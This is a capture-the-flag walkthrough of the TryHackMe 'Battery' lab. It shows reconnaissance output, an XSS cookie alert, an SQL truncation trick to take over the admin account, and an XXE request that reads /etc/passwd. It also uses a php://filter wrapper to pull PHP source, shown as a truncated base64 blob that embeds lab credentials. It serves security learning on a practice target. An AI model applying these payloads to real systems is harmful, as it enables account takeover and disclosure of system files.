Forem: Mikail Kakabayev The latest articles on Forem by Mikail Kakabayev (@kaaayii). https://forem.com/kaaayii https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F3915253%2F0005557c-4ec9-4716-a77e-95c4ebbd8003.png Forem: Mikail Kakabayev https://forem.com/kaaayii en TryHackMe | Battery | WALKTHROUGH Mikail Kakabayev Sat, 23 May 2026 14:24:59 +0000 https://forem.com/kaaayii/tryhackme-battery-walkthrough-4d4d https://forem.com/kaaayii/tryhackme-battery-walkthrough-4d4d <p><strong>LAB:</strong> Battery<br> <strong>DIFFICULTY:</strong> Medium<br> <strong>TARGET:</strong> flag1.txt, flag2.txt, root.txt<br> <strong>TOOLS:</strong> Nmap, Gobuster, BurpSuite<br> <strong>VULNERABLE:</strong> SQL Truncation Attack, XML External Entity Injection</p> <p>First, let's do some recon using NMAP:</p> <ul> <li>-sC - Default script scan</li> <li>-sV - Version detection</li> <li>-O - OS detection </li> </ul> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nb">sudo </span>nmap <span class="nt">-sC</span> <span class="nt">-sV</span> <span class="nt">-O</span> <span class="o">{</span>LABS_IP_ADDRESS<span class="o">}</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight console"><code><span class="go">Starting Nmap 7.98 ( https://nmap.org ) at 2026-05-22 22:13 +0800 Nmap scan report for {LABS_IP_ADDRESS} Host is up (0.28s latency). Not shown: 998 closed tcp ports (reset) PORT STATE SERVICE VERSION </span><span class="gp">22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux;</span><span class="w"> </span>protocol 2.0<span class="o">)</span> <span class="go">| ssh-hostkey: | 1024 14:6b:67:4c:1e:89:eb:cd:47:a2:40:6f:5f:5c:8c:c2 (DSA) | 2048 66:42:f7:91:e4:7b:c6:7e:47:17:c6:27:a7:bc:6e:73 (RSA) | 256 a8:6a:92:ca:12:af:85:42:e4:9c:2b:0e:b5:fb:a8:8b (ECDSA) |_ 256 62:e4:a3:f6:c6:19:ad:30:0a:30:a1:eb:4a:d3:12:d3 (ED25519) 80/tcp open http Apache httpd 2.4.7 ((Ubuntu)) |_http-title: Site doesn't have a title (text/html). |_http-server-header: Apache/2.4.7 (Ubuntu) No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: OS:SCAN(V=7.98%E=4%D=5/22%OT=22%CT=1%CU=34654%PV=Y%DS=3%DC=I%G=Y%TM=6A1064C OS:3%P=x86_64-apple-darwin23.6.0)SEQ(SP=102%GCD=1%ISR=108%TI=Z%CI=I%II=I%TS OS:=8)SEQ(SP=105%GCD=1%ISR=10B%TI=Z%CI=I%II=I%TS=8)SEQ(SP=105%GCD=1%ISR=10D OS:%TI=Z%CI=I%II=I%TS=8)SEQ(SP=108%GCD=1%ISR=108%TI=Z%CI=I%II=I%TS=8)SEQ(SP OS:=108%GCD=1%ISR=10A%TI=Z%CI=I%II=I%TS=8)OPS(O1=M4E8ST11NW6%O2=M4E8ST11NW6 OS:%O3=M4E8NNT11NW6%O4=M4E8ST11NW6%O5=M4E8ST11NW6%O6=M4E8ST11)WIN(W1=68DF%W OS:2=68DF%W3=68DF%W4=68DF%W5=68DF%W6=68DF)ECN(R=Y%DF=Y%T=40%W=6903%O=M4E8NN OS:SNW6%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y OS:%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR OS:%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40 OS:%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G OS:%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S) Network Distance: 3 hops </span><span class="gp">Service Info: OS: Linux;</span><span class="w"> </span>CPE: cpe:/o:linux:linux_kernel <span class="go"> OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 38.38 seconds </span></code></pre> </div> <p>Here we got open ports: <code>ssh/22</code> &amp; <code>http/80</code></p> <p>Now, i'm going to check whats in port 80:</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fi5ceellui29ifjuka0yx.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fi5ceellui29ifjuka0yx.png" alt=" " width="800" height="563"></a></p> <p>Here we have a webpage but nothing interesting here. So we need to use Gobuster to find hidden directories.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight console"><code><span class="go">=============================================================== Gobuster v3.8.2 by OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://{LABS_IP_ADDRESS}/ [+] Method: GET [+] Threads: 10 [+] Wordlist: Documents/pentesting/SecLists-master/Discovery/Web-Content/common.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.8.2 [+] Timeout: 10s =============================================================== Starting gobuster in directory enumeration mode =============================================================== .htaccess (Status: 403) [Size: 288] .hta (Status: 403) [Size: 283] .htpasswd (Status: 403) [Size: 288] **admin.php (Status: 200) [Size: 663]** index.html (Status: 200) [Size: 406] **report (Status: 200) [Size: 16912]** </span><span class="gp">**scripts (Status: 301) [Size: 313] [--&gt;</span><span class="w"> </span>http://<span class="o">{</span>LABS_IP_ADDRESS<span class="o">}</span>/scripts/]<span class="k">**</span> <span class="go">server-status (Status: 403) [Size: 292] Progress: 4751 / 4751 (100.00%) =============================================================== Finished =============================================================== </span></code></pre> </div> <p>We got 3 directories to check. Let's start with <code>/admin.php</code>.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F1aych3iqvcdmle44e5lz.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F1aych3iqvcdmle44e5lz.png" alt=" " width="800" height="570"></a></p> <p>I tried some fake credentials to make sure if it has <strong>Information Disclosure</strong>, <strong>Rate Limiting</strong>, or <strong>SQL Injection</strong>. But what I found instead is that the login page has <strong>a 12-character input limit</strong> on the username field. We will come back here but first let's register and check how admin panel looks like.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fw0jbm4i08csb78cy6hlv.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fw0jbm4i08csb78cy6hlv.png" alt=" " width="576" height="770"></a></p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fnazia2z9tyja0k3iun15.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fnazia2z9tyja0k3iun15.png" alt=" " width="800" height="568"></a></p> <p>I discovered reflected XSS in the <strong>Account Number</strong> parameter of the <strong>Transfer Money</strong> endpoint. The app fails to encode or validate my input before reflecting it in the HTTP response. This allowed me to execute <code>alert(document.cookie)</code> and view John's <em>(which we registered as)</em> session cookie.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F881b7hi2jskl0ral8aju.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F881b7hi2jskl0ral8aju.png" alt=" " width="799" height="532"></a></p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F973qlbvp25ai38ztywhx.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F973qlbvp25ai38ztywhx.png" alt=" " width="800" height="686"></a></p> <p>I also discovered that the app is vulnerable to <strong>HTML injection</strong>. By inserting HTML tags into the input field, I was able to alter the page's content and inject custom messages — including the 'HACKED!!!' notice shown in the transaction failure message.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F78ntvv1soav25ub0r19b.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F78ntvv1soav25ub0r19b.png" alt=" " width="800" height="749"></a></p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fb7ay9u3cbl86w419c0lx.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fb7ay9u3cbl86w419c0lx.png" alt=" " width="794" height="164"></a></p> <p>Before diving deeper, let's check what we got in <code>/report</code>.</p> <p>When you visit <code>http://{LABS_IP_ADDRESS}/report</code> it gives you a file called <code>report</code>. It's an executable file. We can just hit <code>strings</code> or go with Ghidra. I always start with simple, so let's use <code>strings</code>:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>/lib64/ld-linux-x86-64.so.2 __isoc99_scanf puts printf system __cxa_finalize strcmp __libc_start_main libc.so.6 GLIBC_2.7 GLIBC_2.2.5 _ITM_deregisterTMCloneTable __gmon_start__ _ITM_registerTMCloneTable u/UH []A\A]A^A_ admin@bank.a Password Updated Successfully! Sorry you can't update the password Welcome Guest ===================Available Options============== 1. Check users 2. Add user 3. Delete user 4. change password 5. Exit clear ===============List of active users================ support@bank.a contact@bank.a cyber@bank.a admins@bank.a sam@bank.a admin0@bank.a super_user@bank.a control_admin@bank.a it_admin@bank.a Welcome To ABC DEF Bank Managemet System! UserName : Password : guest Your Choice : email : not available for guest account Wrong option Wrong username or password ;*3$" GCC: (Debian 9.3.0-15) 9.3.0 crtstuff.c deregister_tm_clones __do_global_dtors_aux completed.7452 __do_global_dtors_aux_fini_array_entry frame_dummy __frame_dummy_init_array_entry report.c __FRAME_END__ __init_array_end _DYNAMIC __init_array_start __GNU_EH_FRAME_HDR _GLOBAL_OFFSET_TABLE_ __libc_csu_fini update _ITM_deregisterTMCloneTable puts@@GLIBC_2.2.5 _edata options system@@GLIBC_2.2.5 users printf@@GLIBC_2.2.5 __libc_start_main@@GLIBC_2.2.5 __data_start strcmp@@GLIBC_2.2.5 __gmon_start__ __dso_handle _IO_stdin_used __libc_csu_init __bss_start main __isoc99_scanf@@GLIBC_2.7 __TMC_END__ _ITM_registerTMCloneTable __cxa_finalize@@GLIBC_2.2.5 .symtab .strtab .shstrtab .interp .note.gnu.build-id .note.ABI-tag .gnu.hash .dynsym .dynstr .gnu.version .gnu.version_r .rela.dyn .rela.plt .init .plt.got .text .fini .rodata .eh_frame_hdr .eh_frame .init_array .fini_array .dynamic .got.plt .data .bss .comment </code></pre> </div> <p>We have active users listed here.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>support@bank.a contact@bank.a cyber@bank.a admins@bank.a sam@bank.a admin0@bank.a super_user@bank.a control_admin@bank.a it_admin@bank.a </code></pre> </div> <p>But first let's check how the system works using <code>Ghidra</code>.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fwlhgynhypf3bf087f3up.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fwlhgynhypf3bf087f3up.png" alt=" " width="800" height="1070"></a></p> <p>I found a hardcoded admin email (<code>admin@bank.a</code>) inside the <code>update()</code> function. The code compares whatever email I give it with that hardcoded value. If they match, I get to update the password. If not, I'm denied. This means anyone can extract this email from the binary (using Ghidra or <code>strings</code>) and then use it to gain admin access — no authentication needed. Now still we need password to login.</p> <p>Remember that we had some flaws. We found that there is <strong>12-character limitation</strong> in login form. We can use it to register as <code>admin@bank.a</code> . We're going take advantage of <strong>SQL Truncation Flaw</strong>.</p> <h2> IMPORTANT ! </h2> <p>First take time to understand the attack.</p> <h3> HOW SQL Truncation Flaw WORKS? </h3> <ul> <li>The database or application cuts off (truncates) your input after a certain length, and an attacker uses this to bypass security checks.</li> </ul> <h3> The Attack! </h3> <ul> <li>The attacker adds extra characters (like spaces) beyond the column limit so the application checks the full input (safe), but the database only stores the truncated portion which is dangerous, allowing the attacker to inject forbidden values like duplicate usernames or escalate privileges.</li> </ul> <h3> In our case: </h3> <ul> <li> <code>admin@bank.a______xxx</code> gets truncated to <code>admin@bank.a</code>, allowing us to reset the admin's password and login as admin.</li> </ul> <p>Now let's HACK ;)</p> <p>We go to register page and enter following credentials:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>username: admin@bank.a_____xxx -&gt; (spaces after admin as you wish) password: YourPasswordHere </code></pre> </div> <p>Now my favorite part.<br> Let's use BurpSuite.</p> <p>You can use Chromium in BurpSuite or FoxyProxy to capture the request. Go to <strong>Proxy</strong> tab in BurpSuite and Intercept the request to modify it.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fhvq8u2uov0qpo0vh5qp6.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fhvq8u2uov0qpo0vh5qp6.png" alt=" " width="800" height="368"></a></p> <p>After forwarding the request, we logged in as admin.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fyu92d9p14f6wcxwrxn1t.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fyu92d9p14f6wcxwrxn1t.png" alt=" " width="800" height="287"></a></p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F6973qyzd1542rm8yk12x.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F6973qyzd1542rm8yk12x.png" alt=" " width="800" height="449"></a></p> <p>If we go to <strong>command</strong> tab, there is another form. Let's check what happens in the background.If we go to <strong>command</strong> tab, there is another form. Let's check what happens in the background.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fk01w9r4lrovpbwekfzlq.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fk01w9r4lrovpbwekfzlq.png" alt=" " width="800" height="1047"></a></p> <p>This is an XML request. Let's simply try <strong>XXE (XML External Entity)</strong>.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F6mgiosrcsib4arfqk3mp.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F6mgiosrcsib4arfqk3mp.png" alt=" " width="800" height="268"></a></p> <p>After sending request. It shows us Linux system file that stores user account information.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight conf"><code><span class="n">root</span>:<span class="n">x</span>:<span class="m">0</span>:<span class="m">0</span>:<span class="n">root</span>:/<span class="n">root</span>:/<span class="n">bin</span>/<span class="n">bash</span> <span class="n">daemon</span>:<span class="n">x</span>:<span class="m">1</span>:<span class="m">1</span>:<span class="n">daemon</span>:/<span class="n">usr</span>/<span class="n">sbin</span>:/<span class="n">usr</span>/<span class="n">sbin</span>/<span class="n">nologin</span> <span class="n">bin</span>:<span class="n">x</span>:<span class="m">2</span>:<span class="m">2</span>:<span class="n">bin</span>:/<span class="n">bin</span>:/<span class="n">usr</span>/<span class="n">sbin</span>/<span class="n">nologin</span> <span class="n">sys</span>:<span class="n">x</span>:<span class="m">3</span>:<span class="m">3</span>:<span class="n">sys</span>:/<span class="n">dev</span>:/<span class="n">usr</span>/<span class="n">sbin</span>/<span class="n">nologin</span> <span class="n">sync</span>:<span class="n">x</span>:<span class="m">4</span>:<span class="m">65534</span>:<span class="n">sync</span>:/<span class="n">bin</span>:/<span class="n">bin</span>/<span class="n">sync</span> <span class="n">games</span>:<span class="n">x</span>:<span class="m">5</span>:<span class="m">60</span>:<span class="n">games</span>:/<span class="n">usr</span>/<span class="n">games</span>:/<span class="n">usr</span>/<span class="n">sbin</span>/<span class="n">nologin</span> <span class="n">man</span>:<span class="n">x</span>:<span class="m">6</span>:<span class="m">12</span>:<span class="n">man</span>:/<span class="n">var</span>/<span class="n">cache</span>/<span class="n">man</span>:/<span class="n">usr</span>/<span class="n">sbin</span>/<span class="n">nologin</span> <span class="n">lp</span>:<span class="n">x</span>:<span class="m">7</span>:<span class="m">7</span>:<span class="n">lp</span>:/<span class="n">var</span>/<span class="n">spool</span>/<span class="n">lpd</span>:/<span class="n">usr</span>/<span class="n">sbin</span>/<span class="n">nologin</span> <span class="n">mail</span>:<span class="n">x</span>:<span class="m">8</span>:<span class="m">8</span>:<span class="n">mail</span>:/<span class="n">var</span>/<span class="n">mail</span>:/<span class="n">usr</span>/<span class="n">sbin</span>/<span class="n">nologin</span> <span class="n">news</span>:<span class="n">x</span>:<span class="m">9</span>:<span class="m">9</span>:<span class="n">news</span>:/<span class="n">var</span>/<span class="n">spool</span>/<span class="n">news</span>:/<span class="n">usr</span>/<span class="n">sbin</span>/<span class="n">nologin</span> <span class="n">uucp</span>:<span class="n">x</span>:<span class="m">10</span>:<span class="m">10</span>:<span class="n">uucp</span>:/<span class="n">var</span>/<span class="n">spool</span>/<span class="n">uucp</span>:/<span class="n">usr</span>/<span class="n">sbin</span>/<span class="n">nologin</span> <span class="n">proxy</span>:<span class="n">x</span>:<span class="m">13</span>:<span class="m">13</span>:<span class="n">proxy</span>:/<span class="n">bin</span>:/<span class="n">usr</span>/<span class="n">sbin</span>/<span class="n">nologin</span> <span class="n">www</span>-<span class="n">data</span>:<span class="n">x</span>:<span class="m">33</span>:<span class="m">33</span>:<span class="n">www</span>-<span class="n">data</span>:/<span class="n">var</span>/<span class="n">www</span>:/<span class="n">usr</span>/<span class="n">sbin</span>/<span class="n">nologin</span> <span class="n">backup</span>:<span class="n">x</span>:<span class="m">34</span>:<span class="m">34</span>:<span class="n">backup</span>:/<span class="n">var</span>/<span class="n">backups</span>:/<span class="n">usr</span>/<span class="n">sbin</span>/<span class="n">nologin</span> <span class="n">list</span>:<span class="n">x</span>:<span class="m">38</span>:<span class="m">38</span>:<span class="n">Mailing</span> <span class="n">List</span> <span class="n">Manager</span>:/<span class="n">var</span>/<span class="n">list</span>:/<span class="n">usr</span>/<span class="n">sbin</span>/<span class="n">nologin</span> <span class="n">irc</span>:<span class="n">x</span>:<span class="m">39</span>:<span class="m">39</span>:<span class="n">ircd</span>:/<span class="n">var</span>/<span class="n">run</span>/<span class="n">ircd</span>:/<span class="n">usr</span>/<span class="n">sbin</span>/<span class="n">nologin</span> <span class="n">gnats</span>:<span class="n">x</span>:<span class="m">41</span>:<span class="m">41</span>:<span class="n">Gnats</span> <span class="n">Bug</span>-<span class="n">Reporting</span> <span class="n">System</span> (<span class="n">admin</span>):/<span class="n">var</span>/<span class="n">lib</span>/<span class="n">gnats</span>:/<span class="n">usr</span>/<span class="n">sbin</span>/<span class="n">nologin</span> <span class="n">nobody</span>:<span class="n">x</span>:<span class="m">65534</span>:<span class="m">65534</span>:<span class="n">nobody</span>:/<span class="n">nonexistent</span>:/<span class="n">usr</span>/<span class="n">sbin</span>/<span class="n">nologin</span> <span class="n">libuuid</span>:<span class="n">x</span>:<span class="m">100</span>:<span class="m">101</span>::/<span class="n">var</span>/<span class="n">lib</span>/<span class="n">libuuid</span>: <span class="n">syslog</span>:<span class="n">x</span>:<span class="m">101</span>:<span class="m">104</span>::/<span class="n">home</span>/<span class="n">syslog</span>:/<span class="n">bin</span>/<span class="n">false</span> <span class="n">messagebus</span>:<span class="n">x</span>:<span class="m">102</span>:<span class="m">106</span>::/<span class="n">var</span>/<span class="n">run</span>/<span class="n">dbus</span>:/<span class="n">bin</span>/<span class="n">false</span> <span class="n">landscape</span>:<span class="n">x</span>:<span class="m">103</span>:<span class="m">109</span>::/<span class="n">var</span>/<span class="n">lib</span>/<span class="n">landscape</span>:/<span class="n">bin</span>/<span class="n">false</span> <span class="n">sshd</span>:<span class="n">x</span>:<span class="m">104</span>:<span class="m">65534</span>::/<span class="n">var</span>/<span class="n">run</span>/<span class="n">sshd</span>:/<span class="n">usr</span>/<span class="n">sbin</span>/<span class="n">nologin</span> <span class="n">cyber</span>:<span class="n">x</span>:<span class="m">1000</span>:<span class="m">1000</span>:<span class="n">cyber</span>,,,:/<span class="n">home</span>/<span class="n">cyber</span>:/<span class="n">bin</span>/<span class="n">bash</span> <span class="n">mysql</span>:<span class="n">x</span>:<span class="m">107</span>:<span class="m">113</span>:<span class="n">MySQL</span> <span class="n">Server</span>,,,:/<span class="n">nonexistent</span>:/<span class="n">bin</span>/<span class="n">false</span> <span class="n">yash</span>:<span class="n">x</span>:<span class="m">1002</span>:<span class="m">1002</span>:,,,:/<span class="n">home</span>/<span class="n">yash</span>:/<span class="n">bin</span>/<span class="n">bash</span> </code></pre> </div> <p>Looking that we got usernames called <code>cyber</code> and <code>yash</code>. We can login SSH server using this credentials.</p> <p>But first, I couldn't read <code>/acc.php</code> directly because the server executes PHP files instead of returning their source code. So I used <code>php://filter/convert.base64-encode/resource=</code> to read the file as Base64-encoded text, then decoded it to see the actual PHP code and look for passwords.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fepkzxpbzun1qgjmtpvvs.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fepkzxpbzun1qgjmtpvvs.png" alt=" " width="800" height="268"></a><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight html"><code>PCFET0NUWVBFIGh0bWw+CjxodG1sPgo8aGVhZD4KPHN0eWxlPgpmb3JtCnsKICBib3JkZXI6IDJweCBzb2xpZCBibGFjazsKICBvdXRsaW5lOiAjNENBRjUwIHNvbGlkIDNweDsKICBtYXJnaW46IGF1dG87CiAgd2lkdGg6MTgwcHg7CiAgcGFkZGluZzogMjBweDsKICB0ZXh0LWFsaWduOiBjZW50ZXI7Cn0KCgp1bCB7CiAgbGlzdC1zdHlsZS10eXBlOiBub25lOwogIG1hcmdpbjogMDsKICBwYWRkaW5nOiAwOwogIG92ZXJmbG93OiBoaWRkZW47CiAgYmFja2dyb3VuZC1jb2xvcjogIzMzMzsKfQoKbGkgewogIGZsb2F0OiBsZWZ0OwogIGJvcmRlci1yaWdodDoxcHggc29saWQgI2JiYjsKfQoKbGk6bGFzdC1jaGlsZCB7CiAgYm9yZGVyLXJpZ2h0OiBub25lOwp9CgpsaSBhIHsKICBkaXNwbGF5OiBibG9jazsKICBjb2xvcjogd2hpdGU7CiAgdGV4dC1hbGlnbjogY2VudGVyOwogIHBhZGRpbmc6IDE0cHggMTZweDsKICB0ZXh0LWRlY29yYXRpb246IG5vbmU7Cn0KCmxpIGE6aG92ZXI6bm90KC5hY3RpdmUpIHsKICBiYWNrZ3JvdW5kLWNvbG9yOiAjMTExOwp9CgouYWN0aXZlIHsKICBiYWNrZ3JvdW5kLWNvbG9yOiBibHVlOwp9Cjwvc3R5bGU+CjwvaGVhZD4KPGJvZHk+Cgo8dWw+CiAgPGxpPjxhIGhyZWY9ImRhc2hib2FyZC5waHAiPkRhc2hib2FyZDwvYT48L2xpPgogIDxsaT48YSBocmVmPSJ3aXRoLnBocCI+V2l0aGRyYXcgTW9uZXk8L2E+PC9saT4KICA8bGk+PGEgaHJlZj0iZGVwby5waHAiPkRlcG9zaXQgTW9uZXk8L2E+PC9saT4KICA8bGk+PGEgaHJlZj0idHJhLnBocCI+VHJhbnNmZXIgTW9uZXk8L2E+PC9saT4KICA8bGk+PGEgaHJlZj0iYWNjLnBocCI+TXkgQWNjb3VudDwvYT48L2xpPgogIDxsaT48YSBocmVmPSJmb3Jtcy5waHAiPmNvbW1hbmQ8L2E+PC9saT4KICA8bGk+PGEgaHJlZj0ibG9nb3V0LnBocCI+TG9nb3V0PC9hPjwvbGk+CiAgPGxpIHN0eWxlPSJmbG9hdDpyaWdodCI+PGEgaHJlZj0iY29udGFjdC5waHAiPkNvbnRhY3QgVXM8L2E+PC9saT4KPC91bD48YnI+PGJyPjxicj48YnI+Cgo8L2JvZHk+CjwvaHRtbD4KCjw/cGhwCgpzZXNzaW9uX3N0YXJ0KCk7CmlmKGlzc2V0KCRfU0VTU0lPTlsnZmF2Y29sb3InXSkgYW5kICRfU0VTU0lPTlsnZmF2Y29sb3InXT09PSJhZG1pbkBiYW5rLmEiKQp7CgplY2hvICI8aDMgc3R5bGU9J3RleHQtYWxpZ246Y2VudGVyOyc+V2VjbG9tZSB0byBBY2NvdW50IGNvbnRyb2wgcGFuZWw8L2gzPiI7CmVjaG8gIjxmb3JtIG1ldGhvZD0nUE9TVCc+IjsKZWNobyAiPGlucHV0IHR5cGU9J3RleHQnIHBsYWNlaG9sZGVyPSdBY2NvdW50IG51bWJlcicgbmFtZT0nYWNubyc+IjsKZWNobyAiPGJyPjxicj48YnI+IjsKZWNobyAiPGlucHV0IHR5cGU9J3RleHQnIHBsYWNlaG9sZGVyPSdNZXNzYWdlJyBuYW1lPSdtc2cnPiI7CmVjaG8gIjxpbnB1dCB0eXBlPSdzdWJtaXQnIHZhbHVlPSdTZW5kJyBuYW1lPSdidG4nPiI7CmVjaG8gIjwvZm9ybT4iOwovL01ZIENSRURTIDotIGN5YmVyOnN1cGVyI3NlY3VyZSZwYXNzd29yZCEKaWYoaXNzZXQoJF9QT1NUWydidG4nXSkpCnsKJG1zPSRfUE9TVFsnbXNnJ107CmVjaG8gIm1zOiIuJG1zOwppZigkbXM9PT0iaWQiKQp7CnN5